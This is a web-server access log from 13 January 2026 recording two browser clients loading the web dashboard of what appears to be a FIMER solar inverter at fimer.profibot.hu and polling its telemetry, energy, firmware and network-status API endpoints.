+[13/Jan/2026:08:19:21 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.15.156] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:21 +0000] - 204 204 - GET http fimer.profibot.hu "/v1/elc/config" [Client 37.76.15.156] [Length 0] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768345199999&bin=month_of_year&aggregation=diff" [Client 37.76.15.156] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.15.156] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768345199999&bin=yearly&aggregation=diff" [Client 37.76.15.156] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:21 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.15.156] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:22 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 37.76.15.156] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:22 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.15.156] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.15.156] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:25 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.15.156] [Length 1678] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.15.156] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.15.156] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.15.156] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.15.156] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.15.156] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.15.156] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:31 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.15.156] [Length 1683] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.15.156] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:31 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.15.156] [Length 1683] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.15.156] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.15.156] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:31 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.15.156] [Length 1683] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:19:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768345199999&bin=week_of_year&aggregation=diff" [Client 37.76.15.156] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/" [Client 84.1.26.27] [Length 1663] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.css?version=1729759760754" [Client 84.1.26.27] [Length 595] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.css?5470dfb553c45ab13d14" [Client 84.1.26.27] [Length 595] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/splash-screen.es6.js?5470dfb553c45ab13d14" [Client 84.1.26.27] [Length 487] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/index.css?version=1729759760754" [Client 84.1.26.27] [Length 46644] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/index.css?5470dfb553c45ab13d14" [Client 84.1.26.27] [Length 46644] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/index.es6.js?5470dfb553c45ab13d14" [Client 84.1.26.27] [Length 491776] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Fimer-Grotesk-Bold.woff2" [Client 84.1.26.27] [Length 35332] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Regular.ttf" [Client 84.1.26.27] [Length 42239] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[13/Jan/2026:08:21:17 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Fimer-Grotesk-Regular.woff2" [Client 84.1.26.27] [Length 34828] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Bold.ttf" [Client 84.1.26.27] [Length 42386] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/fa-solid-900.woff2" [Client 84.1.26.27] [Length 78268] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/fonts/Muli-Medium.ttf" [Client 84.1.26.27] [Length 42417] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/index.css?5470dfb553c45ab13d14" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 84.1.26.27] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 404 404 - GET http fimer.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 181] [Gzip 3.22] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/assets/fimer-solar-2.jpg" [Client 84.1.26.27] [Length 66542] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 84.1.26.27] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 84.1.26.27] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1681] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 84.1.26.27] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:18 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 84.1.26.27] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 84.1.26.27] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 84.1.26.27] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 84.1.26.27] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 84.1.26.27] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:19 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 84.1.26.27] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:23 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:23 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 84.1.26.27] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 84.1.26.27] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/modbus_device_monitor/device/list" [Client 84.1.26.27] [Length 180] [Gzip 3.24] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/measures" [Client 84.1.26.27] [Length 337] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/grid_power_ctrl/obj/max_abs_active_power?scope=setting" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1679] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768345199999&bin=week_of_year&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/private/setup" [Client 84.1.26.27] [Length 111] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 204 204 - GET http fimer.profibot.hu "/v1/elc/config" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768345199999&bin=month_of_year&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:26 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768345199999&bin=yearly&aggregation=diff" [Client 84.1.26.27] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:27 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 84.1.26.27] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:27 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:28 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 84.1.26.27] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:28 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:28 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 84.1.26.27] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:31 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 84.1.26.27] [Length 1686] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:08:21:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 84.1.26.27] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 